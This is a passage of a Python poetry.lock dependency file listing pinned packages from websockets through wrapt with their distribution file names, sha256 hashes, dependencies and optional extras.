"websockets-12.0-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:d554236b2a2006e0ce16315c16eaa0d628dab009c33b63ea03f41c6107958374"}, {file = "websockets-12.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:2d225bb6886591b1746b17c0573e29804619c8f755b5598d875bb4235ea639be"}, {file = "websockets-12.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:eb809e816916a3b210bed3c82fb88eaf16e8afcf9c115ebb2bacede1797d2547"}, {file = "websockets-12.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c588f6abc13f78a67044c6b1273a99e1cf31038ad51815b3b016ce699f0d75c2"}, {file = "websockets-12.0-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:5aa9348186d79a5f232115ed3fa9020eab66d6c3437d72f9d2c8ac0c6858c558"}, {file = "websockets-12.0-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6350b14a40c95ddd53e775dbdbbbc59b124a5c8ecd6fbb09c2e52029f7a9f480"}, {file = "websockets-12.0-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:70ec754cc2a769bcd218ed8d7209055667b30860ffecb8633a834dde27d6307c"}, {file = "websockets-12.0-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:6e96f5ed1b83a8ddb07909b45bd94833b0710f738115751cdaa9da1fb0cb66e8"}, {file = "websockets-12.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:4d87be612cbef86f994178d5186add3d94e9f31cc3cb499a0482b866ec477603"}, {file = "websockets-12.0-cp310-cp310-win32.whl", hash = "sha256:befe90632d66caaf72e8b2ed4d7f02b348913813c8b0a32fae1cc5fe3730902f"}, {file = "websockets-12.0-cp310-cp310-win_amd64.whl", hash = "sha256:363f57ca8bc8576195d0540c648aa58ac18cf85b76ad5202b9f976918f4219cf"}, {file = "websockets-12.0-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:5d873c7de42dea355d73f170be0f23788cf3fa9f7bed718fd2830eefedce01b4"}, {file = "websockets-12.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:3f61726cae9f65b872502ff3c1496abc93ffbe31b278455c418492016e2afc8f"}, {file = "websockets-12.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:ed2fcf7a07334c77fc8a230755c2209223a7cc44fc27597729b8ef5425aa61a3"}, {file = "websockets-12.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8e332c210b14b57904869ca9f9bf4ca32f5427a03eeb625da9b616c85a3a506c"}, {file = "websockets-12.0-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:5693ef74233122f8ebab026817b1b37fe25c411ecfca084b29bc7d6efc548f45"}, {file = "websockets-12.0-cp311-cp311-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6e9e7db18b4539a29cc5ad8c8b252738a30e2b13f033c2d6e9d0549b45841c04"}, {file = "websockets-12.0-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:6e2df67b8014767d0f785baa98393725739287684b9f8d8a1001eb2839031447"}, {file = "websockets-12.0-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:bea88d71630c5900690fcb03161ab18f8f244805c59e2e0dc4ffadae0a7ee0ca"}, {file = "websockets-12.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:dff6cdf35e31d1315790149fee351f9e52978130cef6c87c4b6c9b3baf78bc53"}, {file = "websockets-12.0-cp311-cp311-win32.whl", hash = "sha256:3e3aa8c468af01d70332a382350ee95f6986db479ce7af14d5e81ec52aa2b402"}, {file = "websockets-12.0-cp311-cp311-win_amd64.whl", hash = "sha256:25eb766c8ad27da0f79420b2af4b85d29914ba0edf69f547cc4f06ca6f1d403b"}, {file = "websockets-12.0-cp312-cp312-macosx_10_9_universal2.whl", hash = "sha256:0e6e2711d5a8e6e482cacb927a49a3d432345dfe7dea8ace7b5790df5932e4df"}, {file = "websockets-12.0-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:dbcf72a37f0b3316e993e13ecf32f10c0e1259c28ffd0a85cee26e8549595fbc"}, {file = "websockets-12.0-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:12743ab88ab2af1d17dd4acb4645677cb7063ef4db93abffbf164218a5d54c6b"}, {file = "websockets-12.0-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:7b645f491f3c48d3f8a00d1fce07445fab7347fec54a3e65f0725d730d5b99cb"}, {file = "websockets-12.0-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:9893d1aa45a7f8b3bc4510f6ccf8db8c3b62120917af15e3de247f0780294b92"}, {file = "websockets-12.0-cp312-cp312-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1f38a7b376117ef7aff996e737583172bdf535932c9ca021746573bce40165ed"}, {file = "websockets-12.0-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:f764ba54e33daf20e167915edc443b6f88956f37fb606449b4a5b10ba42235a5"}, {file = "websockets-12.0-cp312-cp312-musllinux_1_1_i686.whl", hash = "sha256:1e4b3f8ea6a9cfa8be8484c9221ec0257508e3a1ec43c36acdefb2a9c3b00aa2"}, {file = "websockets-12.0-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:9fdf06fd06c32205a07e47328ab49c40fc1407cdec801d698a7c41167ea45113"}, {file = "websockets-12.0-cp312-cp312-win32.whl", hash = "sha256:baa386875b70cbd81798fa9f71be689c1bf484f65fd6fb08d051a0ee4e79924d"}, {file = "websockets-12.0-cp312-cp312-win_amd64.whl", hash = "sha256:ae0a5da8f35a5be197f328d4727dbcfafa53d1824fac3d96cdd3a642fe09394f"}, {file = "websockets-12.0-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:5f6ffe2c6598f7f7207eef9a1228b6f5c818f9f4d53ee920aacd35cec8110438"}, {file = "websockets-12.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:9edf3fc590cc2ec20dc9d7a45108b5bbaf21c0d89f9fd3fd1685e223771dc0b2"}, {file = "websockets-12.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:8572132c7be52632201a35f5e08348137f658e5ffd21f51f94572ca6c05ea81d"}, {file = "websockets-12.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:604428d1b87edbf02b233e2c207d7d528460fa978f9e391bd8aaf9c8311de137"}, {file = "websockets-12.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:1a9d160fd080c6285e202327aba140fc9a0d910b09e423afff4ae5cbbf1c7205"}, {file = "websockets-12.0-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:87b4aafed34653e465eb77b7c93ef058516cb5acf3eb21e42f33928616172def"}, {file = "websockets-12.0-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:b2ee7288b85959797970114deae81ab41b731f19ebcd3bd499ae9ca0e3f1d2c8"}, {file = "websockets-12.0-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:7fa3d25e81bfe6a89718e9791128398a50dec6d57faf23770787ff441d851967"}, {file = "websockets-12.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:a571f035a47212288e3b3519944f6bf4ac7bc7553243e41eac50dd48552b6df7"}, {file = "websockets-12.0-cp38-cp38-win32.whl", hash = "sha256:3c6cc1360c10c17463aadd29dd3af332d4a1adaa8796f6b0e9f9df1fdb0bad62"}, {file = "websockets-12.0-cp38-cp38-win_amd64.whl", hash = "sha256:1bf386089178ea69d720f8db6199a0504a406209a0fc23e603b27b300fdd6892"}, {file = "websockets-12.0-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:ab3d732ad50a4fbd04a4490ef08acd0517b6ae6b77eb967251f4c263011a990d"}, {file = "websockets-12.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:a1d9697f3337a89691e3bd8dc56dea45a6f6d975f92e7d5f773bc715c15dde28"}, {file = "websockets-12.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:1df2fbd2c8a98d38a66f5238484405b8d1d16f929bb7a33ed73e4801222a6f53"}, {file = "websockets-12.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:23509452b3bc38e3a057382c2e941d5ac2e01e251acce7adc74011d7d8de434c"}, {file = "websockets-12.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:2e5fc14ec6ea568200ea4ef46545073da81900a2b67b3e666f04adf53ad452ec"}, {file = "websockets-12.0-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:46e71dbbd12850224243f5d2aeec90f0aaa0f2dde5aeeb8fc8df21e04d99eff9"}, {file = "websockets-12.0-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:b81f90dcc6c85a9b7f29873beb56c94c85d6f0dac2ea8b60d995bd18bf3e2aae"}, {file = "websockets-12.0-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:a02413bc474feda2849c59ed2dfb2cddb4cd3d2f03a2fedec51d6e959d9b608b"}, {file = "websockets-12.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:bbe6013f9f791944ed31ca08b077e26249309639313fff132bfbf3ba105673b9"}, {file = "websockets-12.0-cp39-cp39-win32.whl", hash = "sha256:cbe83a6bbdf207ff0541de01e11904827540aa069293696dd528a6640bd6a5f6"}, {file = "websockets-12.0-cp39-cp39-win_amd64.whl", hash = "sha256:fc4e7fa5414512b481a2483775a8e8be7803a35b30ca805afa4998a84f9fd9e8"}, {file = "websockets-12.0-pp310-pypy310_pp73-macosx_10_9_x86_64.whl", hash = "sha256:248d8e2446e13c1d4326e0a6a4e9629cb13a11195051a73acf414812700badbd"}, {file = "websockets-12.0-pp310-pypy310_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f44069528d45a933997a6fef143030d8ca8042f0dfaad753e2906398290e2870"}, {file = "websockets-12.0-pp310-pypy310_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:c4e37d36f0d19f0a4413d3e18c0d03d0c268ada2061868c1e6f5ab1a6d575077"}, {file = "websockets-12.0-pp310-pypy310_pp73-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3d829f975fc2e527a3ef2f9c8f25e553eb7bc779c6665e8e1d52aa22800bb38b"}, {file = "websockets-12.0-pp310-pypy310_pp73-win_amd64.whl", hash = "sha256:2c71bd45a777433dd9113847af751aae36e448bc6b8c361a566cb043eda6ec30"}, {file = "websockets-12.0-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:0bee75f400895aef54157b36ed6d3b308fcab62e5260703add87f44cee9c82a6"}, {file = "websockets-12.0-pp38-pypy38_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:423fc1ed29f7512fceb727e2d2aecb952c46aa34895e9ed96071821309951123"}, {file = "websockets-12.0-pp38-pypy38_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:27a5e9964ef509016759f2ef3f2c1e13f403725a5e6a1775555994966a66e931"}, {file = "websockets-12.0-pp38-pypy38_pp73-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c3181df4583c4d3994d31fb235dc681d2aaad744fbdbf94c4802485ececdecf2"}, {file = "websockets-12.0-pp38-pypy38_pp73-win_amd64.whl", hash = "sha256:b067cb952ce8bf40115f6c19f478dc71c5e719b7fbaa511359795dfd9d1a6468"}, {file = "websockets-12.0-pp39-pypy39_pp73-macosx_10_9_x86_64.whl", hash = "sha256:00700340c6c7ab788f176d118775202aadea7602c5cc6be6ae127761c16d6b0b"}, {file = "websockets-12.0-pp39-pypy39_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e469d01137942849cff40517c97a30a93ae79917752b34029f0ec72df6b46399"}, {file = "websockets-12.0-pp39-pypy39_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:ffefa1374cd508d633646d51a8e9277763a9b78ae71324183693959cf94635a7"}, {file = "websockets-12.0-pp39-pypy39_pp73-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ba0cab91b3956dfa9f512147860783a1829a8d905ee218a9837c18f683239611"}, {file = "websockets-12.0-pp39-pypy39_pp73-win_amd64.whl", hash = "sha256:2cb388a5bfb56df4d9a406783b7f9dbefb888c09b71629351cc6b036e9259370"}, {file = "websockets-12.0-py3-none-any.whl", hash = "sha256:dc284bbc8d7c78a6c69e0c7325ab46ee5e40bb4d50e494d8131a07ef47500e9e"}, {file = "websockets-12.0.tar.gz", hash = "sha256:81df9cbcbb6c260de1e007e58c011bfebe2dafc8435107b0537f393dd38c8b1b"}, ] [[package]] name = "werkzeug" version = "3.0.1" description = "The comprehensive WSGI web application library." optional = true python-versions = ">=3.8" files = [ {file = "werkzeug-3.0.1-py3-none-any.whl", hash = "sha256:90a285dc0e42ad56b34e696398b8122ee4c681833fb35b8334a095d82c56da10"}, {file = "werkzeug-3.0.1.tar.gz", hash = "sha256:507e811ecea72b18a404947aded4b3390e1db8f826b494d76550ef45bb3b1dcc"}, ] [package.dependencies] MarkupSafe = ">=2.1.1" [package.extras] watchdog = ["watchdog (>=2.3)"] [[package]] name = "wget" version = "3.2" description = "pure python download utility" optional = true python-versions = "*" files = [ {file = "wget-3.2.zip", hash = "sha256:35e630eca2aa50ce998b9b1a127bb26b30dfee573702782aa982f875e3f16061"}, ] [[package]] name = "wheel" version = "0.41.2" description = "A built-package format for Python" optional = true python-versions = ">=3.7" files = [ {file = "wheel-0.41.2-py3-none-any.whl", hash = "sha256:75909db2664838d015e3d9139004ee16711748a52c8f336b52882266540215d8"}, {file = "wheel-0.41.2.tar.gz", hash = "sha256:0c5ac5ff2afb79ac23ab82bab027a0be7b5dbcf2e54dc50efe4bf507de1f7985"}, ] [package.extras] test = ["pytest (>=6.0.0)", "setuptools (>=65)"] [[package]] name = "whylabs-client" version = "0.5.8" description = "WhyLabs API client" optional = true python-versions = ">=3.6" files = [ {file = "whylabs-client-0.5.8.tar.gz", hash = "sha256:7f71a036f88fc2e21d89e56246db7e42547b40bf1f45bb74c28532e173206525"}, {file = "whylabs_client-0.5.8-py3-none-any.whl", hash = "sha256:26b6b481eb806ed006ff29c4ed8845acdba3fccc84333419aad628a7540a9dec"}, ] [package.dependencies] python-dateutil = "*" urllib3 = ">=1.25.3" [[package]] name = "whylogs" version = "1.3.11" description = "Profile and monitor your ML data pipeline end-to-end" optional = true python-versions = ">=3.7.1,<4" files = [ {file = "whylogs-1.3.11-py3-none-any.whl", hash = "sha256:9011b2fc2023974d337633b627955d4ab2f53b796e1fc4a27c7530c3d394a315"}, {file = "whylogs-1.3.11.tar.gz", hash = "sha256:fa83af0fb84d0868d032d871ce2db83398aea9f3b220c6a5937dd1e03f3d4abb"}, ] [package.dependencies] platformdirs = ">=3.5.0,<4.0.0" protobuf = ">=3.19.4" requests = ">=2.27,<3.0" types-requests = ">=2.30.0.0,<3.0.0.0" typing-extensions = {version = ">=3.10", markers = "python_version < \"4\""} whylabs-client = ">=0.5.6,<0.6.0" whylogs-sketching = ">=3.4.1.dev3" [package.extras] all = ["Pillow (>=9.2.0,<10.0.0)", "boto3 (>=1.22.13,<2.0.0)", "faster-fifo (>=1.4.5,<2.0.0)", "fugue (>=0.8.1,<0.9.0)", "google-cloud-storage (>=2.5.0,<3.0.0)", "ipython", "mlflow-skinny (<2.0.1)", "mlflow-skinny (>=2.5.0,<3.0.0)", "numpy", "numpy (>=1.23.2)", "orjson (>=3.8.10,<4.0.0)", "pandas", "pyarrow (>=8.0.0,<13)", "pybars3 (>=0.9,<0.10)", "pyspark (>=3.0.0,<4.0.0)", "scikit-learn (>=1.0.2,<2.0.0)", "scikit-learn (>=1.1.2,<2)", "scipy (>=1.5)", "scipy (>=1.9.2)"] datasets = ["pandas"] docs = ["furo (>=2022.3.4,<2023.0.0)", "ipython_genutils (>=0.2.0,<0.3.0)", "myst-parser[sphinx] (>=0.17.2,<0.18.0)", "nbconvert (>=7.0.0,<8.0.0)", "nbsphinx (>=0.8.9,<0.9.0)", "sphinx", "sphinx-autoapi", "sphinx-autobuild (>=2021.3.14,<2022.0.0)", "sphinx-copybutton (>=0.5.0,<0.6.0)", "sphinx-inline-tabs", "sphinxext-opengraph (>=0.6.3,<0.7.0)"] embeddings = ["numpy", "numpy (>=1.23.2)", "scikit-learn (>=1.0.2,<2.0.0)", "scikit-learn (>=1.1.2,<2)"] fugue = ["fugue (>=0.8.1,<0.9.0)"] gcs = ["google-cloud-storage (>=2.5.0,<3.0.0)"] image = ["Pillow (>=9.2.0,<10.0.0)", "numpy", "numpy (>=1.23.2)"] mlflow = ["mlflow-skinny (<2.0.1)", "mlflow-skinny (>=2.5.0,<3.0.0)"] proc = ["faster-fifo (>=1.4.5,<2.0.0)", "orjson (>=3.8.10,<4.0.0)", "pandas"] proc-mp = ["orjson (>=3.8.10,<4.0.0)", "pandas"] s3 = ["boto3 (>=1.22.13,<2.0.0)"] spark = ["pyarrow (>=8.0.0,<13)", "pyspark (>=3.0.0,<4.0.0)"] viz = ["Pillow (>=9.2.0,<10.0.0)", "ipython", "numpy", "numpy (>=1.23.2)", "pybars3 (>=0.9,<0.10)", "scipy (>=1.5)", "scipy (>=1.9.2)"] [[package]] name = "whylogs-sketching" version = "3.4.1.dev3" description = "sketching library of whylogs" optional = true python-versions = "*" files = [ {file = "whylogs-sketching-3.4.1.dev3.tar.gz", hash = "sha256:40b90eb9d5e4cbbfa63f6a1f3a3332b72258d270044b79030dc5d720fddd9499"}, {file = "whylogs_sketching-3.4.1.dev3-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:9c20134eda881064099264f795d60321777b5e6c2357125a7a2787c9f15db684"}, {file = "whylogs_sketching-3.4.1.dev3-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:e76ac4c2d0214b8de8598867e721f774cca8877267bc2a9b2d0d06950fe76bd5"}, {file = "whylogs_sketching-3.4.1.dev3-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:edc2b463d926ccacb7ee2147d206850bb0cbfea8766f091e8c575ada48db1cfd"}, {file = "whylogs_sketching-3.4.1.dev3-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:fdc2a3bd73895d1ffac1b3028ff55aaa6b60a9ec42d7b6b5785fa140f303dec0"}, {file = "whylogs_sketching-3.4.1.dev3-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:46460eefcf22bcf20b0e6208de32e358478c17b1239221eb038d434f14ec427c"}, {file = "whylogs_sketching-3.4.1.dev3-cp310-cp310-win_amd64.whl", hash = "sha256:58b99a070429a7119a5727ac61c4e9ebcd6e92eed3d2646931a487fff3d6630e"}, {file = "whylogs_sketching-3.4.1.dev3-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:531a4af8f707c1e8138a4ae41a117ba53241372bf191666a9e6b44ab6cd9e634"}, {file = "whylogs_sketching-3.4.1.dev3-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0ba536fca5f9578fa34d106c243fdccfef7d75b9d1fffb9d93df0debfe8e3ebc"}, {file = "whylogs_sketching-3.4.1.dev3-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:afa843c68cafa08e82624e6a33d13ab7f00ad0301101960872fe152d5af5ab53"}, {file = "whylogs_sketching-3.4.1.dev3-cp311-cp311-win_amd64.whl", hash = "sha256:303d55c37565340c2d21c268c64a712fad612504cc4b98b1d1df848cac6d934f"}, {file = "whylogs_sketching-3.4.1.dev3-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:9d65fcf8dade1affe50181582b8894929993e37d7daa922d973a811790cd0208"}, {file = "whylogs_sketching-3.4.1.dev3-cp36-cp36m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c4845e77c208ae64ada9170e1b92ed0abe28fe311c0fc35f9d8efa6926211ca2"}, {file = "whylogs_sketching-3.4.1.dev3-cp36-cp36m-musllinux_1_1_x86_64.whl", hash = "sha256:02cac1c87ac42d7fc7e6597862ac50bc035825988d21e8a2d763b416e83e845f"}, {file = "whylogs_sketching-3.4.1.dev3-cp36-cp36m-win_amd64.whl", hash = "sha256:52a174784e69870543fb87910e5549759f01a7f4cb6cac1773b2cc194ec0b72f"}, {file = "whylogs_sketching-3.4.1.dev3-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:0931fc7500b78baf8f44222f1e3b58cfb707b0120328bc16cc50beaab5a954ec"}, {file = "whylogs_sketching-3.4.1.dev3-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:803c104338a5c4e1c6eb077d35ca3a4443e455aa4e7f2769c93560bf135cdeb3"}, {file = "whylogs_sketching-3.4.1.dev3-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:49e8f20351077497880b088dff9342f4b54d2d3c650c0b43daf121d97fb42468"}, {file = "whylogs_sketching-3.4.1.dev3-cp37-cp37m-win_amd64.whl", hash = "sha256:f9f3507b5df34de7a95b75f80009644371dd6406f9d8795e820edf8a594aeacc"}, {file = "whylogs_sketching-3.4.1.dev3-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:2986dd5b35a93267e6d89e7aa256f714105bbe61bdb0381aeab588c2688e46b6"}, {file = "whylogs_sketching-3.4.1.dev3-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:14f1bf4903e9cd2a196fe5a7268cca1434d423233e073917130d5b845f539c2a"}, {file = "whylogs_sketching-3.4.1.dev3-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:2ecfe0e4a629a4cefec9d7c7fac234119688085ba5f62feabed710cb5a322f8b"}, {file = "whylogs_sketching-3.4.1.dev3-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:000e2c11b7bbbdefb3a343c15955868a682c02d607557fef7bad5a6ffd09a0cf"}, {file = "whylogs_sketching-3.4.1.dev3-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:1e70ed1ed2f9c174a80673ae2ca24c1ec0e2a01c0bd6b0728640492fd5a50178"}, {file = "whylogs_sketching-3.4.1.dev3-cp38-cp38-win_amd64.whl", hash = "sha256:9efd56d5a21566fc49126ef54d37116078763bb9f8955b9c77421b4ca3fd8fc6"}, {file = "whylogs_sketching-3.4.1.dev3-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:832247fd9d3ecf13791418a75c359db6c3aeffd51d7372d026e95f307ef286cc"}, {file = "whylogs_sketching-3.4.1.dev3-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:cc81b547e331d96f6f4227280b9b5968ca4bd48dd7cb0c8b68c022037800009f"}, {file = "whylogs_sketching-3.4.1.dev3-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3abf13da4347393a302843c2f06ce4e5fc56fd9c8564f64da13ceafb81eef90b"}, {file = "whylogs_sketching-3.4.1.dev3-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d1d6e7d0ddb66ab725d7af63518ef6a24cd45b075b81e1d2081709df4c989853"}, {file = "whylogs_sketching-3.4.1.dev3-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:0b05112e3f70cfccddd2f72e464fa113307d97188891433133d4219b9f8f5456"}, {file = "whylogs_sketching-3.4.1.dev3-cp39-cp39-win_amd64.whl", hash = "sha256:23759a00dd0e7019fbac06d9e9ab005ad6c14f80ec7935ccebccb7127296bc06"}, ] [[package]] name = "widgetsnbextension" version = "4.0.9" description = "Jupyter interactive widgets for Jupyter Notebook" optional = false python-versions = ">=3.7" files = [ {file = "widgetsnbextension-4.0.9-py3-none-any.whl", hash = "sha256:91452ca8445beb805792f206e560c1769284267a30ceb1cec9f5bcc887d15175"}, {file = "widgetsnbextension-4.0.9.tar.gz", hash = "sha256:3c1f5e46dc1166dfd40a42d685e6a51396fd34ff878742a3e47c6f0cc4a2a385"}, ] [[package]] name = "wikipedia" version = "1.4.0" description = "Wikipedia API for Python" optional = true python-versions = "*" files = [ {file = "wikipedia-1.4.0.tar.gz", hash = "sha256:db0fad1829fdd441b1852306e9856398204dc0786d2996dd2e0c8bb8e26133b2"}, ] [package.dependencies] beautifulsoup4 = "*" requests = ">=2.0.0,<3.0.0" [[package]] name = "win32-setctime" version = "1.1.0" description = "A small Python utility to set file creation time on Windows" optional = true python-versions = ">=3.5" files = [ {file = "win32_setctime-1.1.0-py3-none-any.whl", hash = "sha256:231db239e959c2fe7eb1d7dc129f11172354f98361c4fa2d6d2d7e278baa8aad"}, {file = "win32_setctime-1.1.0.tar.gz", hash = "sha256:15cf5750465118d6929ae4de4eb46e8edae9a5634350c01ba582df868e932cb2"}, ] [package.extras] dev = ["black (>=19.3b0)", "pytest (>=4.6.2)"] [[package]] name = "wolframalpha" version = "5.0.0" description = "Wolfram|Alpha 2.0 API client" optional = true python-versions = ">=3.6" files = [ {file = "wolframalpha-5.0.0-py3-none-any.whl", hash = "sha256:159f5d8fd31e4a734a34a9f3ae8aec4e9b2ef392607f82069b4a324b6b1831d5"}, {file = "wolframalpha-5.0.0.tar.gz", hash = "sha256:38bf27654039ec85cc62c199dd319b6a4d6a7badfed7af1cd161f081afdb57c0"}, ] [package.dependencies] "jaraco.context" = "*" more-itertools = "*" xmltodict = "*" [package.extras] docs = ["jaraco.packaging (>=8.2)", "rst.linker (>=1.9)", "sphinx"] testing = ["keyring", "pmxbot", "pytest (>=3.5,!=3.7.3)", "pytest-black (>=0.3.7)", "pytest-checkdocs (>=1.2.3)", "pytest-cov", "pytest-enabler", "pytest-flake8", "pytest-mypy"] [[package]] name = "wonderwords" version = "2.2.0" description = "A python package for random words and sentences in the english language" optional = true python-versions = ">=3.6" files = [ {file = "wonderwords-2.2.0-py3-none-any.whl", hash = "sha256:65fc665f1f5590e98f6d9259414ea036bf1b6dd83e51aa6ba44473c99ca92da1"}, {file = "wonderwords-2.2.0.tar.gz", hash = "sha256:0b7ec6f591062afc55603bfea71463afbab06794b3064d9f7b04d0ce251a13d0"}, ] [package.extras] cli = ["rich (==9.10.0)"] [[package]] name = "wrapt" version = "1.15.0" description = "Module for decorators, wrappers and monkey patching." optional = false python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,>=2.7" files = [ {file = "wrapt-1.15.0-cp27-cp27m-macosx_10_9_x86_64.whl", hash = "sha256:ca1cccf838cd28d5a0883b342474c630ac48cac5df0ee6eacc9c7290f76b11c1"}, {file = "wrapt-1.15.0-cp27-cp27m-manylinux1_i686.whl", hash = "sha256:e826aadda3cae59295b95343db8f3d965fb31059da7de01ee8d1c40a60398b29"}, {file = "wrapt-1.15.0-cp27-cp27m-manylinux1_x86_64.whl", hash = "sha256:5fc8e02f5984a55d2c653f5fea93531e9836abbd84342c1d1e17abc4a15084c2"}, {file = "wrapt-1.15.0-cp27-cp27m-manylinux2010_i686.whl", hash = "sha256:96e25c8603a155559231c19c0349245eeb4ac0096fe3c1d0be5c47e075bd4f46"}, {file = "wrapt-1.15.0-cp27-cp27m-manylinux2010_x86_64.whl", hash = "sha256:40737a081d7497efea35ab9304b829b857f21558acfc7b3272f908d33b0d9d4c"}, {file = "wrapt-1.15.0-cp27-cp27mu-manylinux1_i686.whl", hash = "sha256:f87ec75864c37c4c6cb908d282e1969e79763e0d9becdfe9fe5473b7bb1e5f09"}, {file = "wrapt-1.15.0-cp27-cp27mu-manylinux1_x86_64.whl", hash = "sha256:1286eb30261894e4c70d124d44b7fd07825340869945c79d05bda53a40caa079"}, {file = "wrapt-1.15.0-cp27-cp27mu-manylinux2010_i686.whl", hash = "sha256:493d389a2b63c88ad56cdc35d0fa5752daac56ca755805b1b0c530f785767d5e"}, {file = "wrapt-1.15.0-cp27-cp27mu-manylinux2010_x86_64.whl", hash = "sha256:58d7a75d731e8c63614222bcb21dd992b4ab01a399f1f09dd82af17bbfc2368a"}, {file = "wrapt-1.15.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:21f6d9a0d5b3a207cdf7acf8e58d7d13d463e639f0c7e01d82cdb671e6cb7923"}, {file = "wrapt-1.15.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:ce42618f67741d4697684e501ef02f29e758a123aa2d669e2d964ff734ee00ee"}, {file = "wrapt-1.15.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = 